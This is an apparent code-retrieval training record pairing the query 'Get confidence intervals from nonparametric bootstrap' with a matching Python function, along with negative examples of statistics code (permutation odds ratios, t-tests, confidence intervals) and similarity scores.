self.seg_analyzer.target_intersection(sub_list[1])\n\n # cell_permutation_data_dict[0]['del'].append([d0.total_del, d0.total_targeted_del_breakpoints,\n # d0.total_unique_del, d0.unique_targeted_del_breakpoints])\n # cell_permutation_data_dict[1]['del'].append([d1.total_del, d1.total_targeted_del_breakpoints,\n # d1.total_unique_del, d1.unique_targeted_del_breakpoints])\n # cell_permutation_data_dict[0]['ins'].append([d0.total_ins, d0.total_targeted_ins_breakpoints,\n # d0.total_unique_ins, d0.unique_targeted_ins_breakpoints])\n #\n # cell_permutation_data_dict[1]['ins'].append([d1.total_ins, d1.total_targeted_ins_breakpoints,\n # d1.total_unique_ins, d1.unique_targeted_ins_breakpoints])\n\n total_breakpoint0 = d0.total_del+d0.total_ins\n total_targeted0 = d0.total_targeted_del_breakpoints+d0.total_targeted_ins_breakpoints\n total_unique_breakpoint0 = d0.total_unique_del+d0.total_unique_ins\n total_unique_targeted0 = d0.unique_targeted_del_breakpoints+d0.unique_targeted_ins_breakpoints\n\n total_breakpoint1 = d1.total_del+d1.total_ins\n total_targeted1 = d1.total_targeted_del_breakpoints+d1.total_targeted_ins_breakpoints\n total_unique_breakpoint1 = d1.total_unique_del+d1.total_unique_ins\n total_unique_targeted1 = d1.unique_targeted_del_breakpoints+d1.unique_targeted_ins_breakpoints\n\n total_target_ratio0 = total_targeted0/total_breakpoint0\n total_target_ratio1 = total_targeted1/total_breakpoint1\n\n total_target_odds = total_target_ratio0/total_target_ratio1\n\n unique_target0 = total_unique_targeted0/total_unique_breakpoint0\n unique_target1 = total_unique_targeted1/total_unique_breakpoint1\n\n unique_target_odds = unique_target0/unique_target1\n\n try:\n del_target_odds = \\\n (d0.total_del/d0.total_targeted_del_breakpoints)/(d1.total_del/d1.total_targeted_del_breakpoints)\n except ZeroDivisionError:\n del_target_odds = 0\n try:\n udel_target_odds = \\\n (d0.unique_targeted_del_breakpoints / d0.total_unique_del) / (d1.unique_targeted_del_breakpoints /\n d1.total_unique_del)\n except ZeroDivisionError:\n udel_target_odds = 0\n try:\n ins_target_odds = \\\n (d0.total_targeted_ins_breakpoints/d0.total_ins)/(d1.total_targeted_ins_breakpoints/d1.total_ins)\n except ZeroDivisionError:\n ins_target_odds = 0\n try:\n uins_target_odds = \\\n (d0.unique_targeted_ins_breakpoints / d0.total_unique_ins) / (d1.unique_targeted_ins_breakpoints /\n d1.total_unique_ins)\n except ZeroDivisionError:\n uins_target_odds = 0\n\n total_targeted_odds_ratio_list.append(total_target_odds)\n unique_targeted_odds_ratio_list.append(unique_target_odds)\n total_targeted_del_odds_ratio_list.append(del_target_odds)\n total_targeted_ins_odds_ratio_list.append(ins_target_odds)\n unique_targeted_del_odds_ratio_list.append(udel_target_odds)\n unique_targeted_ins_odds_ratio_list.append(uins_target_odds)\n\n odds_string += \\\n \"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\" \\\n \"\\t{}\\t{}\\t{}\\t{}\\t{}\\n\"\\\n .format(total_target_odds, unique_target_odds, del_target_odds, udel_target_odds, ins_target_odds,\n uins_target_odds, total_breakpoint0, d0.total_del, d0.total_ins, total_targeted0,\n d0.total_targeted_del_breakpoints, d0.total_targeted_ins_breakpoints, total_unique_breakpoint0,\n d0.total_unique_del, d0.total_unique_ins, total_unique_targeted0,\n d0.unique_targeted_del_breakpoints, d0.unique_targeted_ins_breakpoints, total_breakpoint1,\n d1.total_del, d1.total_ins, total_targeted1, d1.total_targeted_del_breakpoints,\n d1.total_targeted_ins_breakpoints, total_unique_breakpoint1, d1.total_unique_del,\n d1.total_unique_ins, total_unique_targeted1, d1.unique_targeted_del_breakpoints,\n d1.unique_targeted_ins_breakpoints)\n\n odds_labels = \"Total Targeted\\tUnique Targeted\\tDel Targeted\\tUnique Del Targeted\\tIns Targeted\\t\" \\\n \"Unique Ins Targeted\\tSample_0 Total\\tSample_0 tDel\\tSample_0 tIns\\tSample_0 Targeted\\t\" \\\n \"Sample_0 tDel Targeted\\tSample_0 tIns Targeted\\tSample_0 Unique\\tSample_0 uDel\\tSample_0 uIns\\t\"\\\n \"Sample_0 uTargeted\\tSample_0 uDel Targeted\\tSample_0 uIns Targeted\\tSample_1 Total\\t\" \\\n \"Sample_1 tDel\\tSample_1 tIns\\tSample_1 Targeted\\tSample_1 tDel Targeted\\t\" \\\n \"Sample_1 tIns Targeted\\tSample_1 Unique\\tSample_1 uDel Targeted\\tSample_1 uIns Targeted\\n\"\n\n total_odds_mean = round(scipy.mean(total_targeted_odds_ratio_list), 2)\n del_odds_mean = round(scipy.mean(total_targeted_del_odds_ratio_list), 2)\n ins_odds_mean = round(scipy.mean(total_targeted_ins_odds_ratio_list), 2)\n\n unique_odds_mean = round(scipy.mean(unique_targeted_odds_ratio_list), 2)\n unique_del_odds_mean = round(scipy.mean(unique_targeted_del_odds_ratio_list), 2)\n unique_ins_odds_mean = round(scipy.mean(unique_targeted_ins_odds_ratio_list), 2)\n\n total975 = numpy.percentile(total_targeted_odds_ratio_list, 97.5, interpolation='linear')\n total25 = numpy.percentile(total_targeted_odds_ratio_list, 2.5, interpolation='linear')\n\n del975 = numpy.percentile(total_targeted_del_odds_ratio_list, 97.5, interpolation='linear')\n del25 = numpy.percentile(total_targeted_del_odds_ratio_list, 2.5, interpolation='linear')\n\n ins975 = numpy.percentile(total_targeted_ins_odds_ratio_list, 97.5, interpolation='linear')\n ins25 = numpy.percentile(total_targeted_ins_odds_ratio_list, 2.5, interpolation='linear')\n\n unique_total975 = numpy.percentile(unique_targeted_odds_ratio_list, 97.5, interpolation='linear')\n unique_total25 = numpy.percentile(unique_targeted_odds_ratio_list, 2.5, interpolation='linear')\n\n unique_del975 = numpy.percentile(unique_targeted_del_odds_ratio_list, 97.5, interpolation='linear')\n unique_del25 = numpy.percentile(unique_targeted_del_odds_ratio_list, 2.5, interpolation='linear')\n\n unique_ins975 = numpy.percentile(unique_targeted_ins_odds_ratio_list, 97.5, interpolation='linear')\n unique_ins25 = numpy.percentile(unique_targeted_ins_odds_ratio_list, 2.5, interpolation='linear')\n\n outstring = \"Permutation Analysis Module v{}; {} Type Permutations run {}\\n\" \\\n \"Target File:\\t{}\\nSegCopy File:\\t{}\\n\\n\" \\\n \"\\tTotalOddsMean\\tUniqueOddsMean\\tTotal 97.5\\tTotal 2.5\\tUnique 97.5\\tUnique 2.5\\n\" \\\n \"Total\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\nDel\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\nIns\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\" \\\n \"\\n\\n{}\\n{}\" \\\n .format(__version__, self.args.Permutation_Type, date.today().strftime(\"%Y-%m-%d\"), self.args.Target_File,\n self.args.Segment_File, total_odds_mean, unique_odds_mean, total975, total25, unique_total975,\n unique_total25, del_odds_mean, unique_del_odds_mean, del975, del25, unique_del975, unique_del25,\n ins_odds_mean, unique_ins_odds_mean, ins975, ins25, unique_ins975, unique_ins25, odds_labels,\n odds_string)\n\n outfile = open(\"{0}{1}_odds_ratios.txt\".format(self.args.Working_Folder, self.args.Job_Name), 'w')\n outfile.write(outstring)\n outfile.close()\n self.log.info(\"Sample Permutation Complete\")\n\n return\n #\n # ratio_mean_list = []\n # ratio_std_list = []\n # ratio_list = []\n # odds_ratio_list = []\n # outstring = \"\"\n #\n # # Format data for output file.\n # for sub_group in natsort.natsorted(cell_permutation_data_dict):\n # for key, values in cell_permutation_data_dict[sub_group].items():\n # if key == \"bp\":\n # break_point_mean = int(round(scipy.mean(values)))\n # break_point_std = round(scipy.std(values), 2)\n # break_point_median = int(round(scipy.median(values)))\n # elif key == \"intsect\":\n # intersect_mean = int(round(scipy.mean(values)))\n # intersect_std = round(scipy.std(values), 2)\n # intersect_median = int(round(scipy.median(values)))\n # elif key == \"bp/intsect\":\n # ratio_mean = scipy.mean(values)\n # ratio_std = scipy.std(values)\n # ratio_list.append(values)\n #\n # ratio_mean_list.append(ratio_mean)\n # ratio_std_list.append(ratio_std)\n #\n # outstring += \"{0}\\t{1}\\t{2}\\t{3}\\t{4}\\t{5}\"\\\n # .format(break_point_mean, break_point_median, break_point_std, intersect_mean, intersect_median,\n # intersect_std)\n # outstring += \"\\t\"\n #\n # for l1, l2 in zip(ratio_list[0], ratio_list[1]):\n # odds_ratio_list.append(l1/l2)\n #\n # t = stats.t.interval(0.95, df=self.freq_calc_iterations-1, loc=scipy.mean(odds_ratio_list),\n # scale=scipy.std(odds_ratio_list) / numpy.sqrt(self.freq_calc_iterations))\n #\n # pval = stats.ttest_1samp(odds_ratio_list, 1)\n #\n # outstring += \"{0}\\t{1}\\t{2}\\t{3}\\t{4}\\n\"\\\n # .format(round(scipy.mean(odds_ratio_list), 2), round(scipy.std(odds_ratio_list), 2), round(t[0], 2),\n # round(t[1], 2), pval[1])\n #\n # for v in odds_ratio_list:\n # outstring += \"{0}\\n\".format(v)\n #\n # outfile.write(outstring)\n # outfile.close()\n #\n # print(\"Permutation Analysis of Samples Complete.\")\n #\n # return", "def calc_indttest_90(varx,vary):\n print('\\n>>> Using calc_ttest function!')\n \n ### Import modules\n import numpy as np\n import scipy.stats as sts\n \n ### 2-independent sample t-test\n stat,pvalue = sts.ttest_ind(varx,vary,nan_policy='omit')\n \n ### Significant at 90% confidence level\n pvalue[np.where(pvalue >= 0.1)] = np.nan\n pvalue[np.where(pvalue < 0.1)] = 1.\n pvalue[np.isnan(pvalue)] = 0.\n \n print('*Completed: Finished calc_ttest function!')\n return stat,pvalue", "def probabilistic_mutation(variables_number: int,\n mutation_chance: float) -> MutationPointsTyping:\n mutation_points = []\n for var_index in range(variables_number):\n if generate_random_float(0, 1) <= mutation_chance:\n mutation_points.append(var_index)\n return mutation_points", "def test_t(x, y, level, equal_var=True):\n if len(x) < 2 or len(y) < 2:\n return True\n s, p_value = stat.ttest_ind(x, y, 0, equal_var=equal_var)\n if np.any(p_value < level):\n return False\n else:\n return True", "def _perform_pairwise_tests(labels, dists, tail_type, num_permutations):\r\n result = []\r\n\r\n # Convert our notion of tail type into the format expected by\r\n # PyCogent.\r\n if tail_type == 'two-sided':\r\n tail_type = None\r\n\r\n # Compare each pair of distributions, keeping track of the number of actual\r\n # tests that were successfully performed so that we can correct for\r\n # multiple comparisons.\r\n num_tests = 0\r\n for g1_idx, (g1_label, g1_dist) in enumerate(zip(labels[:-1], dists[:-1])):\r\n for g2_label, g2_dist in zip(\r\n labels[(g1_idx + 1):], dists[(g1_idx + 1):]):\r\n if ((len(g1_dist) == 1 and len(g2_dist) == 1) or\r\n (len(g1_dist) < 1 or len(g2_dist) < 1)):\r\n # Not enough data to run the test.\r\n obs_t, param_p_val, nonparam_p_val = nan, nan, nan\r\n else:\r\n obs_t, param_p_val, _, nonparam_p_val = mc_t_two_sample(\r\n g1_dist, g2_dist, tails=tail_type,\r\n permutations=num_permutations)\r\n result.append([g1_label, g2_label, obs_t, param_p_val, None,\r\n nonparam_p_val, None])\r\n if obs_t is not nan:\r\n num_tests += 1\r\n\r\n # Correct the p-values for multiple comparisons, now that we know how many\r\n # tests succeeded.\r\n for stat in result:\r\n stat[4] = stat[3] if stat[3] is nan else min(stat[3] * num_tests, 1)\r\n stat[6] = stat[5] if stat[5] is nan else min(stat[5] * num_tests, 1)\r\n return result", "def test_perm(self):\n fun = get_problem('perm', dimension=2)\n self.assertAlmostEqual(fun(np.array([1.0, 0.5])), 0.0)" ]
[ "0.66151273", "0.6504498", "0.60829633", "0.6001584", "0.5969407", "0.5941336", "0.5911625", "0.5903978", "0.5805787", "0.5780182", "0.57714087", "0.56875885", "0.56720537", "0.56512654", "0.5612089", "0.55364573", "0.5505601", "0.55000603", "0.5491501", "0.54649895", "0.5463243", "0.54480636", "0.5421607", "0.5403361", "0.53854585", "0.53620905", "0.5341939", "0.5336638", "0.5336576", "0.531883", "0.5310258", "0.5276074", "0.5219025", "0.5210075", "0.5153671", "0.51318705", "0.5128854", "0.5082108", "0.50744444", "0.50656664", "0.5064684", "0.5064395", "0.506239", "0.50334436", "0.5032123", "0.5030216", "0.5017557", "0.50118536", "0.50031817", "0.49982548", "0.49862432", "0.49855164", "0.4984528", "0.49828437", "0.49693185", "0.4958215", "0.49562752", "0.4955817", "0.49492437", "0.49417093", "0.4933322", "0.49295682", "0.49288517", "0.49248117", "0.49236134", "0.49209735", "0.49194595", "0.4919258", "0.49149826", "0.490558", "0.489798", "0.48726717", "0.48568735", "0.48508635", "0.48396516", "0.48378855", "0.48358098", "0.48280552", "0.48266178", "0.4824697", "0.48231125", "0.48224688", "0.48218274", "0.48160177", "0.48133948", "0.48102725", "0.48013264", "0.4796622", "0.4795773", "0.4794755", "0.47904405", "0.4786908", "0.47820985", "0.4780801", "0.47734714", "0.47711176", "0.47670692", "0.47660482", "0.4764014", "0.47577173" ]
0.70762056
0
Get confidence intervals from nonparametric bootstrap.
def bootstrap_confidence_interval( arr, ci=0.95, n_bootstraps=2000, stat_fun="mean", random_state=None ): if stat_fun == "mean": def stat_fun(x): return x.mean(axis=0) elif stat_fun == "median": def stat_fun(x): return np.median(x, axis=0) elif not callable(stat_fun): raise ValueError("stat_fun must be 'mean', 'median' or callable.") n_trials = arr.shape[0] indices = np.arange(n_trials, dtype=int) # BCA would be cool to have too rng = check_random_state(random_state) boot_indices = rng.choice(indices, replace=True, size=(n_bootstraps, len(indices))) stat = np.array([stat_fun(arr[inds]) for inds in boot_indices]) ci = (((1 - ci) / 2) * 100, ((1 - ((1 - ci) / 2))) * 100) ci_low, ci_up = np.percentile(stat, ci, axis=0) return np.array([ci_low, ci_up])
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def confidence_intervals(data):\r\n\r\n x_bar = np.nanmean(data) # Mean value\r\n s = np.nanstd(data) # Standard deviation\r\n n = len(data) # Sample size\r\n\r\n lo_conf = x_bar - (1.96 * (s / np.sqrt(n))) # Lower bound of confidence interval\r\n hi_conf = x_bar + (1.96 * (s / np.sqrt(n))) # Upper bound of confidence interval\r\n\r\n conf_range = hi_conf - lo_conf # Size of the 95% confidence interval\r\n\r\n return lo_conf, hi_conf, conf_range", "def get_bootstrap_CI(self, alpha, num_samples):\n\n # set random number generator seed\n numpy.random.seed(1)\n\n # initialize delta array\n delta = numpy.zeros(num_samples)\n\n # obtain bootstrap samples\n for i in range(num_samples):\n sample_i = numpy.random.choice(self._data, size=self._n, replace=True)\n delta[i] = sample_i.mean() - self.get_mean()\n\n # return [l, u]\n return self.get_mean() - numpy.percentile(delta, [100*(1-alpha / 2.0), 100*alpha / 2.0])", "def eeg_bootstrapCI(array,alpha):\t\n\t\n\tif len(array.shape) == 3:\n\t\tprint \"Only works on 2D bootstrapped data (ntpts x nboot)\"\n\t\tarray_low = []\n\t\tarray_high = []\n\telse:\n\t\tntpts, nboot = array.shape\n\t\t#sort along last (bootstrap) dimension\n\t\tarray_srt = np.sort(array,axis=1)\n\t\tarray_low = array_srt[:,np.round(nboot*alpha/2)-1]\n\t\tarray_high = array_srt[:,np.round(nboot*(1-alpha/2))-1]\n\t\treturn array_low,array_high", "def bootstrap_ci(x, n=300, ci=0.95):\n\n low_per = 100 * (1 - ci) / 2\n high_per = 100 * ci + low_per\n x = removena_numpy(x)\n if not len(x):\n return (np.nan, np.nan)\n bootstrap_samples = choice(a=x, size=(\n len(x), n), replace = True).mean(axis = 0)\n return np.percentile(bootstrap_samples, [low_per, high_per])", "def compute_boot_ci(window_means, n_boot=100):\n n_curves = window_means.shape[0]\n\n boot_vals = []\n for _ in range(n_boot):\n indices = np.random.randint(0, n_curves, n_curves)\n means = compute_means(window_means[indices, :])\n boot_vals.append(means)\n\n # crop the means sequences to same length\n shortest_len = min([len(means) for means in boot_vals])\n boot_vals = [means[:shortest_len] for means in boot_vals]\n boot_vals = np.array(boot_vals)\n\n ci_lower = np.percentile(boot_vals, 5, axis=0)\n ci_upper = np.percentile(boot_vals, 95, axis=0)\n return ci_lower, ci_upper", "def _ci(arr, ci=0.95, method=\"bootstrap\", n_bootstraps=2000, random_state=None):\n if method == \"bootstrap\":\n return bootstrap_confidence_interval(\n arr, ci=ci, n_bootstraps=n_bootstraps, random_state=random_state\n )\n else:\n from .parametric import _parametric_ci\n\n return _parametric_ci(arr, ci=ci)", "def get_bootstrap_CI(self, alpha, num_samples):\n return None", "def get_bootstrap_CI(self, alpha, num_samples):\n return None", "def ci(self):\n var_assumptions = self.var_assumptions if self.var_assumptions == \"pooled\" else \"unequal\"\n ci_vals = self.comparison.zconfint_diff(self.alpha, self.hypothesis_sm, var_assumptions)\n\n return [ci_vals, self.ci_percents]", "def confidence_intervals(self, level = 95):\n margin = (100 - level) / 2 # interval is middle level% of vals, so this is margin to either side of it\n try:\n len(self.binom_control)\n len(self.binom_treatment)\n\n except:\n self.binom_distribution()\n\n control = self.binom_control\n treatment = self.binom_treatment\n\n control_upper = np.percentile(a = control, q = level + margin)\n control_lower = np.percentile(a = control, q = margin)\n self.interval_control = {'lower': control_lower, 'upper':control_upper, 'level':level}\n\n treatment_upper = np.percentile(a = treatment, q = level + margin)\n treatment_lower = np.percentile(a = treatment, q = margin)\n self.interval_treatment = {'lower': treatment_lower, 'upper':treatment_upper, 'level':level}\n\n return self.interval_control, self.interval_treatment", "def get_bootstrap_CI(self, alpha, num_samples):\n raise NotImplementedError(\"This is an abstract method and needs to be implemented in derived classes.\")", "def boot_conf_intervals(indep,\n dep,\n estimator,\n display_name=None,\n resample_cases=False,\n significance=0.05,\n num_sims=10000,\n verbose=True,\n seed=None,\n precision=4):\n if display_name is None:\n display_name = \"\"\n\n est_params = estimator.fit(indep, dep)\n est_params = np.array(est_params)\n\n params_arr = resampling.boot_param_dist(indep=indep,\n dep=dep,\n estimator=estimator,\n num_sims=num_sims,\n resample_cases=resample_cases,\n seed=seed,\n include_fixed_params=False,\n verbose=verbose)\n\n if estimator.has_restricted_params:\n est_params = est_params[estimator.estimated_params_indices]\n\n (bca_ci_df,\n percentile_ci_df,\n basic_ci_df) = _confidence_intervals(params_arr=params_arr,\n est_params=est_params,\n significance=significance,\n estimator=estimator,\n indep=indep,\n dep=dep)\n\n if verbose:\n def my_formatter(x):\n format_str = '.' + str(precision) + 'f'\n return format(x, format_str)\n\n formatters = [my_formatter for dummy in range(len(bca_ci_df.columns))]\n\n print()\n print(\"confidence level: \", 100.0 * (1.0 - significance), \"%\")\n print()\n print(\"bootstrap bca confidence intervals\")\n print()\n print(bca_ci_df.to_string(formatters=formatters))\n# if latex:\n# print(bca_ci_df.to_latex(escape=False, formatters=formatters))\n# else:\n print(\"bootstrap percentile confidence intervals\")\n print()\n print(percentile_ci_df.to_string(formatters=formatters))\n print()\n print(\"bootstrap basic confidence intervals\")\n print()\n print(basic_ci_df.to_string(formatters=formatters))\n print()\n\n return bca_ci_df, percentile_ci_df, basic_ci_df", "def compute_confidence_interval(data):\n a = 1.0 * np.array(data)\n m = np.mean(a)\n std = np.std(a)\n pm = 1.96 * (std / np.sqrt(len(a)))\n return m, pm", "def confidenceInterval(model, N = 30):\n predicted_accuracies = [0]*N\n predicted_roc = [0]*N\n for i in tqdm(range(N)):\n X_train, X_test, y_train, y_test = train_test_split(X, y_binary, random_state=i)\n scaler = StandardScaler()\n X_train = scaler.fit_transform(X_train)\n X_test = scaler.transform(X_test)\n model = model.fit(X_train, y_train)\n predicted_accuracies[i] = accuracy_score(model.predict(X_test), y_test)\n predicted_roc[i] = roc_auc_score(model.predict(X_test), y_test)\n r = np.mean(predicted_roc)\n m = np.mean(predicted_accuracies)\n\n variance_roc = np.var(predicted_roc)\n variance_acc = np.var(predicted_accuracies)\n sd_acc = np.sqrt(variance_acc)\n sd_roc = np.sqrt(variance_roc)\n CI_acc = 2*sd_acc\n CI_roc = 2*sd_roc\n return m, CI_acc, r, CI_roc", "def test_conf_interval_normal_method_no_conditionals(data):\n df = data[\"df\"]\n new_df = data[\"new_df\"]\n # ``quantile_estimation_method = \"normal_fit\"``;\n # with no ``conditional_cols``\n ci_model = conf_interval(\n df=df,\n value_col=\"y\",\n residual_col=\"residual\",\n conditional_cols=None,\n quantiles=[0.005, 0.025, 0.975, 0.995],\n quantile_estimation_method=\"normal_fit\",\n sample_size_thresh=5,\n small_sample_size_method=\"std_quantiles\",\n small_sample_size_quantile=0.95,\n min_admissible_value=None,\n max_admissible_value=None)\n\n pred_df = predict_ci(\n new_df,\n ci_model)\n assert list(pred_df.columns) == [\"y_quantile_summary\", ERR_STD_COL], (\n \"pred_df does not have the expected column names\")\n pred_df[\"y_quantile_summary\"] = pred_df[\"y_quantile_summary\"].apply(\n lambda x: tuple(round(e, 2) for e in x))\n assert pred_df[\"y_quantile_summary\"].values[5] == (290.05, 290.37, 292.42, 292.74), (\n \"quantiles are incorrect\")\n assert pred_df[\"y_quantile_summary\"].values[11] == (-5.41, -5.08, -3.04, -2.72), (\n \"quantiles are incorrect\")", "def compute_interval_limits(bias, acceleration, n_boots, ci=95):\n from scipy.stats import norm\n from numpy import isnan, nan\n\n alpha = _compute_alpha_from_ci(ci)\n\n alpha_low = alpha / 2\n alpha_high = 1 - (alpha / 2)\n\n z_low = norm.ppf(alpha_low)\n z_high = norm.ppf(alpha_high)\n\n kws = {'bias': bias, 'acceleration': acceleration}\n low = _compute_quantile(z_low, **kws)\n high = _compute_quantile(z_high, **kws)\n\n if isnan(low) or isnan(high):\n return low, high\n\n else:\n low = int(norm.cdf(low) * n_boots)\n high = int(norm.cdf(high) * n_boots)\n return low, high", "def bootstrap(series, func=statistics.mean, confidence=0.9):\n n = len(series)\n n_bootstrap = 250\n digests = []\n for j in range(n_bootstrap):\n bootstrap_sample = [\n random.choice(series)\n for _ in range(n)\n ]\n digest = func(bootstrap_sample)\n digests.append(digest)\n digests.sort()\n low, mid, high = (1.0-confidence)/2.0, 0.5, (1.0+confidence)/2.0\n low, mid, high = int(low*n_bootstrap), int(mid*n_bootstrap), int(high*n_bootstrap)\n return digests[low], digests[mid], digests[high]", "def get_confidence_interval(self, scores, ci_method='bca', ci_size=0.95, replications=100000, seed_value=None):\n def score(x):\n return np.array([x.mean()])\n data = np.array([float(score) for score in scores])\n if min(data) == max(data):\n return tuple([min(data), max(data)])\n bs = IIDBootstrap(data)\n if seed_value is not None:\n bs.seed(seed_value)\n ci = bs.conf_int(score, replications, method=ci_method, size=ci_size, tail='two')\n return tuple([ci[0][0], ci[1][0]])", "def test_conf_interval_normal_method(data):\n df = data[\"df\"]\n new_df = data[\"new_df\"]\n # ``quantile_estimation_method = \"normal_fit\"``\n ci_model = conf_interval(\n df=df,\n value_col=\"y\",\n residual_col=\"residual\",\n conditional_cols=[\"x\"],\n quantiles=[0.005, 0.025, 0.975, 0.995],\n quantile_estimation_method=\"normal_fit\",\n sample_size_thresh=5,\n small_sample_size_method=\"std_quantiles\",\n small_sample_size_quantile=0.95,\n min_admissible_value=None,\n max_admissible_value=None)\n\n pred_df = predict_ci(\n new_df,\n ci_model)\n assert list(pred_df.columns) == [\"x\", \"y_quantile_summary\", ERR_STD_COL], (\n \"pred_df does not have the expected column names\")\n pred_df[\"y_quantile_summary\"] = pred_df[\"y_quantile_summary\"].apply(\n lambda x: tuple(round(e, 2) for e in x))\n assert pred_df[\"y_quantile_summary\"].values[5] == (289.9, 290.25, 292.54, 292.9), (\n \"quantiles are incorrect\")\n assert pred_df[\"y_quantile_summary\"].values[11] == (-5.14, -4.88, -3.24, -2.98), (\n \"quantiles are incorrect\")", "def get_bootstraps(self):\n col_range = range(self.response.shape[1])\n random_state = np.random.RandomState(seed=self.random_seed)\n return random_state.choice(col_range, size=(self.num_bootstraps, self.response.shape[1])).tolist()", "def confidence(samples, confidence_level):\n mean = scipy.mean(samples)\n sdev = scipy.std(samples)\n n = len(samples)\n df = n - 1\n t = distributions.t.ppf((1+confidence_level)/2.0, df)\n interval = (interval_low, interval_high) = ( mean - t * sdev / math.sqrt(n) , mean + t * sdev / math.sqrt(n) )\n interval_size = interval_high - interval_low\n interval_percentage = interval_size / mean * 100.0\n return (interval, mean, sdev, interval_percentage)", "def bootstrap_interval(data, percentiles=(2.5, 97.5), n_boots=100):\n # Create empty array to fill the results\n bootstrap_means = np.zeros([n_boots, data.shape[-1]])\n for ii in range(n_boots):\n # Generate random indices for data *with* replacement, then take the sample mean\n random_sample = resample(data)\n bootstrap_means[ii] = random_sample.mean(axis=0)\n\n # Compute the percentiles of choice for the bootstrapped means\n percentiles = np.percentile(bootstrap_means, percentiles, axis=0)\n return percentiles", "def do_mean_cis_differ(mean1, ci1, mean2, ci2):\n\n assert ci1 >= 0.0 and ci2 >= 0.0, 'Found negative confidence interval from bootstrapping.'\n x1 = mean1 - ci1\n y1 = mean1 + ci1\n x2 = mean2 - ci2\n y2 = mean2 + ci2\n return do_intervals_differ((x1, y1), (x2, y2))", "def plot_ci_bootstrap(xs, ys, resid, nboot=500, ax=None): \n if ax is None:\n ax = plt.gca()\n\n bootindex = sp.random.randint\n\n for _ in range(nboot):\n resamp_resid = resid[bootindex(0, len(resid) - 1, len(resid))]\n # Make coeffs of for polys\n pc = np.polyfit(xs, ys + resamp_resid, 1) \n # Plot bootstrap cluster\n ax.plot(xs, np.polyval(pc, xs), \"r-\", linewidth=2, alpha=3.0 / float(nboot))\n\n return ax", "def calc_bootstrap(fcs,obs,ref,func, bootstrap_range, L, B):\n \n from sklearn.utils import resample\n \n idxs = np.arange(len(fcs))\n results = []\n \n random_state = 0\n for smp in range(B):\n block_sample = np.array([]).astype(int)\n while(len(block_sample) < len(fcs)):\n random_state += 1\n rolls = resample(idxs, n_samples=1, random_state=random_state)[0]\n block = np.roll(idxs, rolls)[0:L]\n block_sample = np.append(block_sample, block)\n\n block_sample = block_sample[0:len(idxs)]\n results.append(func(fcs[block_sample],obs[block_sample],ref[block_sample]))\n \n try:\n out = [ np.percentile(results, bootstrap_range[0]), \n func(fcs,obs,ref), #np.mean(results), \n np.percentile(results, bootstrap_range[1])]\n except:\n out = [ np.percentile(results, 2.5), \n func(fcs,obs,ref), #np.mean(results), \n np.percentile(results, 97.5)]\n\n # For indicating the statistical significance \n # of the lower boundary:\n if(out[0]>0): \n out.append('*')\n else:\n out.append('')\n \n return out", "def _get_uncertainty_regions(\n mus: np.array, stds: np.array, beta_sqrt: float\n) -> Union[np.array, np.array]:\n low_lims, high_lims = [], []\n\n for i in range(0, mus.shape[1]):\n low_lim, high_lim = _get_uncertainty_region(mus[:, i], stds[:, i], beta_sqrt)\n low_lims.append(low_lim.reshape(-1, 1))\n high_lims.append(high_lim.reshape(-1, 1))\n\n return np.hstack(low_lims), np.hstack(high_lims)", "def bootstrap(data,func,nboot):\n\n n = len(data)\n resamples = np.array([[random.choice(data) for i in range(n)]\n for j in range(nboot)])\n return np.apply_along_axis(func, 1, resamples)", "def confint(arr):\n res=[[],[],[]]\n #r=hpd(arr)\n r=(sap(arr,2.5),sap(arr,97.5))\n res[0]=r[0]\n res[1]=arr.mean(0)\n res[2]=r[1]\n return np.array(res)", "def bootstrap(data, alpha=0.05, n_bootstrap = 2000, func=None, **func_args):\n\t\n\tassert data.ndim == 3, 'Data is not 3-dimensional. Function only works for 3-D data.' \n\t\n\t# Trials form the second dimension\n\tn_trials = data.shape[1]\n\t\n\t# generate randomised bootstrap resamples as random indices\n\tbootstrap_index = np.random.randint(0, n_trials, \n\t\t\t\t\t\t\t\t\t\t(n_trials, n_bootstrap) )\n\t\n\t# For each bin in the histogram, randomly samples from the results\n\t# of each trial and repeats, effectively, n_bootstrap times \n\ttrials_bootstrap = data[:, bootstrap_index, :]\n\t\n\t# dimension one is the trials, zero is the conditions; this averaging \n\t# goes across the trials creating a PSTH for each condition, and,\n\t# importantly, for each bootstrap resample\n\tavg_bootstrap = trials_bootstrap.mean(axis=1)\n\t\n\tif func:\n\t\tavg_bootstrap = func(avg_bootstrap, **func_args)\n\t\t\n\t# find percentile values for each bin along the bootstrap resamples,\n\t# which are on axis 1 \n\tCI_pos = np.percentile(avg_bootstrap, 100*(1 - (alpha/2.)), \n\t\t\t\t\t\t\t\taxis=1)\n\tCI_neg = np.percentile(avg_bootstrap, 100*(alpha/2.), \n\t\t\t\t\t\t\t\taxis=1)\n\n\n\treturn CI_pos, CI_neg", "def confidenceInterval(start,end,confidence):\n\n\tmean = 0.5*(end+start)\n\tstddev = getStdDev(0.5*(end-start), confidence)\n\n\treturn (mean,stddev)", "def confidence_interval(self):\r\n coh_var = np.zeros((self.input.data.shape[0],\r\n self.input.data.shape[0],\r\n self._L), 'd')\r\n for i in range(self.input.data.shape[0]):\r\n for j in range(i):\r\n if i != j:\r\n coh_var[i, j] = tsu.jackknifed_coh_variance(\r\n self.spectra[i],\r\n self.spectra[j],\r\n self.eigs,\r\n adaptive=self._adaptive\r\n )\r\n\r\n idx = triu_indices(self.input.data.shape[0], 1)\r\n coh_var[idx[0], idx[1], ...] = coh_var[idx[1], idx[0], ...].conj()\r\n\r\n coh_mat_xform = tsu.normalize_coherence(self.coherence,\r\n 2 * self.df - 2)\r\n\r\n lb = coh_mat_xform + dist.t.ppf(self.alpha / 2,\r\n self.df - 1) * np.sqrt(coh_var)\r\n ub = coh_mat_xform + dist.t.ppf(1 - self.alpha / 2,\r\n self.df - 1) * np.sqrt(coh_var)\r\n\r\n # convert this measure with the normalizing function\r\n tsu.normal_coherence_to_unit(lb, 2 * self.df - 2, lb)\r\n tsu.normal_coherence_to_unit(ub, 2 * self.df - 2, ub)\r\n\r\n return ub - lb", "def bootstrap_ci(data: np.ndarray,\n stat_fcn,\n num_reps: 